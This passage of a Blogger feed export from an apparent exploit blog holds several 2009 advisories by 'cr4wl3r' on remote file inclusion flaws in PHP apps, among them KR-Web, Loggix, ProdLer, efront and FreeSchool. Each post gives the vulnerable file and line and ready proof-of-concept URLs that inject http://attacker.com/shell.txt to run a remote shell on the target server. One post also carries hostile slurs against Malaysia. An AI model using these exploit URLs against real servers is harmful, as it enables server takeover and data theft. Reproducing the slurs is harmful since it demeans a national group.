/&gt;########################################################################&lt;br /&gt;&lt;br /&gt;/##############################################\&lt;br /&gt;#   all member at  manadocoding.net            #&lt;br /&gt;#   all member at  sekuritionline.net          #&lt;br /&gt;\##############################################/&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4406853742698026097?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4406853742698026097/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/nukehall-03-multiple-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4406853742698026097'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4406853742698026097'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/nukehall-03-multiple-remote-file.html' title='NukeHall &lt;= 0.3 Multiple Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-6700838060794209908</id><published>2009-12-05T19:21:00.000-08:00</published><updated>2009-12-05T19:23:00.922-08:00</updated><title type='text'>KR-Web &lt;= 1.1b2 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]&lt;br /&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#KR-Web &lt;= 1.1b2 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/krw/files/&lt;br /&gt;#Dork                 :  die("Hacking attempt");  :D&lt;br /&gt;########################################################################&lt;br /&gt;#&lt;br /&gt;#Vuln : ./KR-Web-1.1b2/adm/krgourl.php (line 2)&lt;br /&gt;#       &lt;?php&lt;br /&gt;#          include "$DOCUMENT_ROOT/paths.inc";&lt;br /&gt;#       ?&gt;&lt;br /&gt;#PoC  :  http://server/[path]/adm/krgourl.php?DOCUMENT_ROOT=http://attacker.com/shell.txt?cmd&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;#&lt;br /&gt;########################################################################&lt;br /&gt;#Thx 2 : str0ke, opt!x hacker, xoron, irvian, cyberlog, basix,&lt;br /&gt;#        dan seluruh orang yang membenciku dan menyayangiku [I Love U Full] :*&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;/##############################################\&lt;br /&gt;#   all member at  sekuritionline.net          #&lt;br /&gt;#   all member at  manadocoding.net            #&lt;br /&gt;\##############################################/&lt;br /&gt;&lt;br /&gt;  [ Gorontalo / 2009 ]&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-6700838060794209908?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/6700838060794209908/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/kr-web-11b2-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6700838060794209908'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/6700838060794209908'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/12/kr-web-11b2-remote-file-include.html' title='KR-Web &lt;= 1.1b2 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-7123659189817131443</id><published>2009-09-21T18:50:00.002-07:00</published><updated>2009-09-21T18:51:00.806-07:00</updated><title type='text'>Loggix Project &lt;= 9.4.5 Multiple Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;#######################[In The Name Of Allah]##########################&lt;br /&gt;#Loggix Project &lt;= 9.4.5 Multiple Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/loggix/files/&lt;br /&gt;#Author               :  cr4wl3r&lt;br /&gt;#Contact              :  cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;#Location             :  Gorontalo - INDONESIA&lt;br /&gt;#Blog                 :  http://sh3ll4u.blogspot.com&lt;br /&gt;#Dork                 :  No DoRk f0R ScRipT KiDDieS&lt;br /&gt;########################################################################&lt;br /&gt;#file :&lt;br /&gt;#  Calendar.php&lt;br /&gt;#  Comment.php&lt;br /&gt;#  Rss.php&lt;br /&gt;#  Trackback.php&lt;br /&gt;#  LM_Downloads.php&lt;br /&gt;########################################################################&lt;br /&gt;#Bugs :&lt;br /&gt;#  require_once $pathToIndex . '/lib/Loggix/Module.php';&lt;br /&gt;########################################################################&lt;br /&gt;#3xplo!t :&lt;br /&gt;#http://target.com/[path]/lib/Loggix/Module/Calendar.php?pathToIndex=http://attacker.com/shell.txt???&lt;br /&gt;#http://target.com/[path]/lib/Loggix/Module/Comment.php?pathToIndex=http://attacker.com/shell.txt???&lt;br /&gt;#http://target.com/[path]/lib/Loggix/Module/Rss.php?pathToIndex=http://attacker.com/shell.txt???&lt;br /&gt;#http://target.com/[path]/lib/Loggix/Module/Trackback.php?pathToIndex=http://attacker.com/shell.txt??? &lt;br /&gt;#http://target.com/[path]/modules/downloads/lib/LM_Downloads.php?pathToIndex=http://attacker.com/shell.txt???&lt;br /&gt;########################################################################&lt;br /&gt;#Greetz          : MyMom [alm]&lt;br /&gt;#Special Thanks  : str0ke, All MusLim HacKers&lt;br /&gt;#Thanks 2        : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,&lt;br /&gt;#                  mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,&lt;br /&gt;#                  aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,&lt;br /&gt;#                  d3vilnet, donyskaynet, panteto, MaRloN, Dew0&lt;br /&gt;########################################################################&lt;br /&gt;# F0r All MusLim In tHe W0rlD :&lt;br /&gt;# SelaMat IduL FitRi 1 SyaWaL 1430H&lt;br /&gt;# Takabbalallah Huminnawaminkum Minalaidin Walfaizin&lt;br /&gt;########################################################################&lt;br /&gt;#Note : No fuCk, JusT PeaCe&lt;br /&gt;########################################################################&lt;br /&gt;#sekuritionline.net (all crew sekuritionline)&lt;br /&gt;#manadocoding.net (all crew manadocoding)&lt;br /&gt;###########################[VIVA ISLAM]#################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-21]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-7123659189817131443?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/7123659189817131443/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/loggix-project-945-multiple-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7123659189817131443'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/7123659189817131443'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/loggix-project-945-multiple-remote-file.html' title='Loggix Project &lt;= 9.4.5 Multiple Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-557916330013752572</id><published>2009-09-21T18:50:00.001-07:00</published><updated>2009-09-21T18:50:44.160-07:00</updated><title type='text'>ProdLer &lt;= 2.0 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;#######################[In The Name Of Allah]##########################&lt;br /&gt;#ProdLer &lt;= 2.0 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/prodler/files/&lt;br /&gt;#Author               :  cr4wl3r&lt;br /&gt;#Contact              :  cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;#Location             :  Gorontalo - INDONESIA&lt;br /&gt;#Blog                 :  http://sh3ll4u.blogspot.com&lt;br /&gt;#Dork                 :  No DoRk f0R ScRipT KiDDieS&lt;br /&gt;########################################################################&lt;br /&gt;#file :&lt;br /&gt;#  prodler.class.php&lt;br /&gt;# line 4 require_once $sPath.'include/variable.class.php';&lt;br /&gt;########################################################################&lt;br /&gt;#3xplo!t :&lt;br /&gt;#http://target.com/[path]/include/prodler.class.php?sPath=http://attacker.com/shell.txt??? &lt;br /&gt;########################################################################&lt;br /&gt;#Greetz          : MyMom [alm]&lt;br /&gt;#Special Thanks  : str0ke, All MusLim HacKers&lt;br /&gt;#Thanks 2        : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,&lt;br /&gt;#                  mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,&lt;br /&gt;#                  aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,&lt;br /&gt;#                  d3vilnet, donyskaynet, panteto, MaRloN, Dew0&lt;br /&gt;########################################################################&lt;br /&gt;# F0r All MusLim In tHe W0rlD :&lt;br /&gt;# SelaMat IduL FitRi 1 SyaWaL 1430H&lt;br /&gt;# Takabbalallah Huminnawaminkum Minalaidin Walfaizin&lt;br /&gt;########################################################################&lt;br /&gt;#Note : No fuCk, JusT PeaCe&lt;br /&gt;########################################################################&lt;br /&gt;#sekuritionline.net (all crew sekuritionline)&lt;br /&gt;#manadocoding.net (all crew manadocoding)&lt;br /&gt;###########################[VIVA ISLAM]#################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-21]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-557916330013752572?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/557916330013752572/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/prodler-20-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/557916330013752572'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/557916330013752572'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/prodler-20-remote-file-include.html' title='ProdLer &lt;= 2.0 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-2346819447428807317</id><published>2009-09-19T01:57:00.000-07:00</published><updated>2009-09-19T02:00:18.631-07:00</updated><title type='text'>PointComma &lt;= 3.8b2 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;#######################[In The Name Of Allah]##########################&lt;br /&gt;#PointComma &lt;= 3.8b2 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://nchc.dl.sourceforge.net/project/pointcomma/pointcomma/&lt;br /&gt;#Author               :  cr4wl3r&lt;br /&gt;#Contact              :  cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;#Location             :  Gorontalo - INDONESIA&lt;br /&gt;#Blog                 :  http://sh3ll4u.blogspot.com&lt;br /&gt;#Dork                 :  No DoRk f0R ScRipT KiDDieS&lt;br /&gt;########################################################################&lt;br /&gt;#file :&lt;br /&gt;#  pctemplate.php&lt;br /&gt;# line 14 require($pcConfig['smartyPath'].'Smarty.class.php');&lt;br /&gt;########################################################################&lt;br /&gt;#3xplo!t :&lt;br /&gt;#http://target.com/[path]/includes/classes/pctemplate.php?pcConfig[smartyPath]=http://attacker.com/shell.txt??? &lt;br /&gt;########################################################################&lt;br /&gt;#Greetz          : MyMom [alm]&lt;br /&gt;#Special Thanks  : str0ke, All MusLim HacKers&lt;br /&gt;#Thanks 2        : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,&lt;br /&gt;#                  mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,&lt;br /&gt;#                  aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,&lt;br /&gt;#                  d3vilnet, donyskaynet, panteto, MaRloN, Dew0&lt;br /&gt;########################################################################&lt;br /&gt;# F0r All MusLim In tHe W0rlD :&lt;br /&gt;# SelaMat IduL FitRi 1 SyaWaL 1430H&lt;br /&gt;# Takabbalallah Huminnawaminkum Minalaidin Walfaizin&lt;br /&gt;########################################################################&lt;br /&gt;#Note : No fuCk, JusT PeaCe&lt;br /&gt;########################################################################&lt;br /&gt;#sekuritionline.net (all crew sekuritionline)&lt;br /&gt;#manadocoding.net (all crew manadocoding)&lt;br /&gt;###########################[VIVA ISLAM]#################################&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-2346819447428807317?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/2346819447428807317/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/pointcomma-38b2-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2346819447428807317'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/2346819447428807317'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/pointcomma-38b2-remote-file-include.html' title='PointComma &lt;= 3.8b2 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-129793926745843810</id><published>2009-09-19T00:52:00.000-07:00</published><updated>2009-09-19T00:53:57.260-07:00</updated><title type='text'>Public Media Manager &lt;= 1.3 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;#######################[In The Name Of Allah]##########################&lt;br /&gt;#Public Media Manager &lt;= 1.3 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/pmm-cms/files/&lt;br /&gt;#Author               :  cr4wl3r&lt;br /&gt;#Contact              :  cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;#Location             :  Gorontalo - INDONESIA&lt;br /&gt;#Blog                 :  http://sh3ll4u.blogspot.com&lt;br /&gt;#Dork                 :  No DoRk f0R ScRipT KiDDieS&lt;br /&gt;########################################################################&lt;br /&gt;#file :&lt;br /&gt;#  calmenu.php&lt;br /&gt;# line 4 &lt;?require $forms_dir."calmenuform.php";?&gt;&lt;br /&gt;########################################################################&lt;br /&gt;#3xplo!t :&lt;br /&gt;#http://target.com/[path]/comcal/calmenu.php?forms_dir=http://attacker.com/shell.txt??? &lt;br /&gt;########################################################################&lt;br /&gt;#Greetz          : MyMom [alm]&lt;br /&gt;#Special Thanks  : str0ke, All MusLim HacKers&lt;br /&gt;#Thanks 2        : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral, s4va,&lt;br /&gt;#                  mywisdom, wendys, cyberpeace, agenr@t, basix, nTc, angky.tatoki, funky_sensey, exnome,&lt;br /&gt;#                  aRiee, Romy.Chairul, Mr.C, Mr.Crossbeam, noQen, CyberSufi, untouch, g4pt3k, chawanua,&lt;br /&gt;#                  d3vilnet, donyskaynet, panteto, MaRloN, Dew0&lt;br /&gt;########################################################################&lt;br /&gt;# F0r All MusLim In tHe W0rlD :&lt;br /&gt;# SelaMat IduL FitRi 1 SyaWaL 1430H&lt;br /&gt;# Takabbalallah Huminnawaminkum Minalaidin Walfaizin&lt;br /&gt;########################################################################&lt;br /&gt;#Note : No fuCk, JusT PeaCe&lt;br /&gt;########################################################################&lt;br /&gt;#sekuritionline.net (all crew sekuritionline)&lt;br /&gt;#manadocoding.net (all crew manadocoding)&lt;br /&gt;###########################[VIVA ISLAM]#################################&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-129793926745843810?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/129793926745843810/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/public-media-manager-13-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/129793926745843810'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/129793926745843810'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/public-media-manager-13-remote-file.html' title='Public Media Manager &lt;= 1.3 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4363731494734174312</id><published>2009-09-17T09:31:00.000-07:00</published><updated>2009-09-17T09:32:27.623-07:00</updated><title type='text'>phpPollScript &lt;= 1.3 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;########################################################################&lt;br /&gt;#phpPollScript &lt;= 1.3 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://download.tomex.org/phpPollScriptv13b.zip&lt;br /&gt;#Author               :  cr4wl3r&lt;br /&gt;#Contact              :  cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;#Location             :  Gorontalo - INDONESIA&lt;br /&gt;########################################################################&lt;br /&gt;#file :&lt;br /&gt;#  init.poll.php&lt;br /&gt;# line 2 $inc_path = dirname($include_class);&lt;br /&gt;# line 3 require ($inc_path."/voting.poll.php");&lt;br /&gt;########################################################################&lt;br /&gt;#3xplo!t :&lt;br /&gt;#http://target.com/[path]/php/init.poll.php?include_class=http://attacker.com/shell.txt/test/&lt;br /&gt;########################################################################&lt;br /&gt;#Greetz        : MyMom [alm]&lt;br /&gt;#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral&lt;br /&gt;########################################################################&lt;br /&gt;#sekuritionline.net (all crew sekuritionline)&lt;br /&gt;#manadocoding.net (all crew manadocoding)&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-16]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4363731494734174312?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4363731494734174312/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/phppollscript-13-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4363731494734174312'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4363731494734174312'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/phppollscript-13-remote-file-include.html' title='phpPollScript &lt;= 1.3 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-4850716239433144300</id><published>2009-09-16T10:34:00.004-07:00</published><updated>2009-09-16T10:35:04.040-07:00</updated><title type='text'>efront &lt;= 3.5.4 Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;########################################################################&lt;br /&gt;#efront &lt;= 3.5.4 Remote File Include Vulnerability&lt;br /&gt;#Download Script      :  http://sourceforge.net/projects/efrontlearning/files/&lt;br /&gt;#Author               :  cr4wl3r&lt;br /&gt;#Contact              :  cr4wl3r[4t]linuxmail[dot]org&lt;br /&gt;#Location             :  Gorontalo - INDONESIA&lt;br /&gt;########################################################################&lt;br /&gt;#file :&lt;br /&gt;#  database.php&lt;br /&gt;#line 15 require_once($path.'adodb/adodb.inc.php');&lt;br /&gt;########################################################################&lt;br /&gt;#3xplo!t :&lt;br /&gt;#http://target.com/[path]/libraries/database.php?path=http://attacker.com/shell.txt??? &lt;br /&gt;########################################################################&lt;br /&gt;#Greetz        : MyMom [alm]&lt;br /&gt;#Thanks 2      : opt!x hacker, xoron, irvian, cyberlog, EA ngel, bl4ck_3ng1n3, Hmei7, zvtral&lt;br /&gt;########################################################################&lt;br /&gt;#sekuritionline.net (all crew sekuritionline)&lt;br /&gt;#manadocoding.net (all crew manadocoding)&lt;br /&gt;########################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-15]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-4850716239433144300?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/4850716239433144300/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/efront-354-remote-file-include.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4850716239433144300'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/4850716239433144300'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/efront-354-remote-file-include.html' title='efront &lt;= 3.5.4 Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6120352052168366080.post-515665779819766328</id><published>2009-09-16T10:34:00.003-07:00</published><updated>2009-09-16T10:34:46.649-07:00</updated><title type='text'>FreeSchool &lt;= 1.1.0  Mutiple Remote File Include Vulnerability</title><content type='html'>&lt;pre&gt;######################################################################&lt;br /&gt;#[x] FreeSchool &lt;= 1.1.0  Mutiple Remote File Include Vulnerability                      &lt;br /&gt;#[!] Download Script      :  http://sourceforge.net/projects/freeschool/files/                         &lt;br /&gt;#[!] Author               :  cr4wl3r                                      &lt;br /&gt;#[!] Contact              :  cr4wl3r[4t]linuxmail[dot]org                 &lt;br /&gt;#[!] Location             :  Gorontalo - INDONESIA                        &lt;br /&gt;#[!] Dork                 :  "FuCk y0u MaLaYsia"      &lt;br /&gt;######################################################################&lt;br /&gt;&lt;br /&gt;[x] 3xplo!t :                                                            &lt;br /&gt;                                                                                &lt;br /&gt;http://localhost/[path]/biblioteca/bib_form.php?CLASSPATH=[AvriLhea]    &lt;br /&gt;http://localhost/[path]/biblioteca/bib_pldetails.php?CLASSPATH=[AvriLhea]       &lt;br /&gt;http://localhost/[path]/biblioteca/bib_plform.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/bib_plsearchc.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/bib_plsearchs.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/bib_save.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/bib_searchc.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/bib_searchs.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/edi_form.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/edi_save.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/gen_form.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/gen_save.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/lin_form.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/lin_save.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/luo_form.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/luo_save.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/sog_form.php?CLASSPATH=[AvriLhea]               &lt;br /&gt;http://localhost/[path]/biblioteca/sog_save.php?CLASSPATH=[AvriLhea]&lt;br /&gt;http://localhost/[path]/calendario/cal_insert.php?CLASSPATH=[AvriLhea]                                                               &lt;br /&gt;http://localhost/[path]/calendario/cal_save.php?CLASSPATH=[AvriLhea]&lt;br /&gt;http://localhost/[path]/calendario/cal_saveactivity.php?CLASSPATH=[AvriLhea]&lt;br /&gt;http://localhost/[path]/circolari/cir_save.php?CLASSPATH=[AvriLhea]                                                               &lt;br /&gt;http://localhost/[path]/modulistica/mdl_save.php?CLASSPATH=[AvriLhea]&lt;br /&gt;&lt;br /&gt;######################################################################&lt;br /&gt;#[!] Greetz : MyMom [alm] &lt;br /&gt;#                                                                       &lt;br /&gt;#[!] Special Thanks : str0ke, google, sourceforge, All MusLiM HacKers &lt;br /&gt;#&lt;br /&gt;#[!] Thanks 2 : xoron, opt!x hacker, irvian, cyberlog&lt;br /&gt;#&lt;br /&gt;#[!] AlfaNet Cr3w GoRonTaLo : FaHry PunKs, RhyA HaMim, BoBy C00l, UyaN, ArYa.TaMa&lt;br /&gt;#&lt;br /&gt;#[!] My BiG BozZ MinJo.B0rj0e (YanG PunYa SepaRuH KaMpuNg Bugis, JaNgan LuPa Am-Am) :D&lt;br /&gt;#&lt;br /&gt;#[!] FuCk MaLaYsia, I HaTe MaLaYsia, h0w Ab0uT y0u???&lt;br /&gt;#&lt;br /&gt;#[!] sekuritionline.net | manadocoding.net                                         &lt;br /&gt;######################################################################&lt;br /&gt;&lt;br /&gt;# milw0rm.com [2009-09-03]&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6120352052168366080-515665779819766328?l=sh3ll4u.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://sh3ll4u.blogspot.com/feeds/515665779819766328/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/freeschool-110-mutiple-remote-file.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/515665779819766328'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6120352052168366080/posts/default/515665779819766328'/><link rel='alternate' type='text/html' href='http://sh3ll4u.blogspot.com/2009/09/freeschool-110-mutiple-remote-file.html' title='FreeSchool &lt;= 1.1.0  Mutiple Remote File Include Vulnerability'/><author><name>r00t cr4wl3r</name><uri>http://www.blogger.com/profile/06940730132728454405</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' 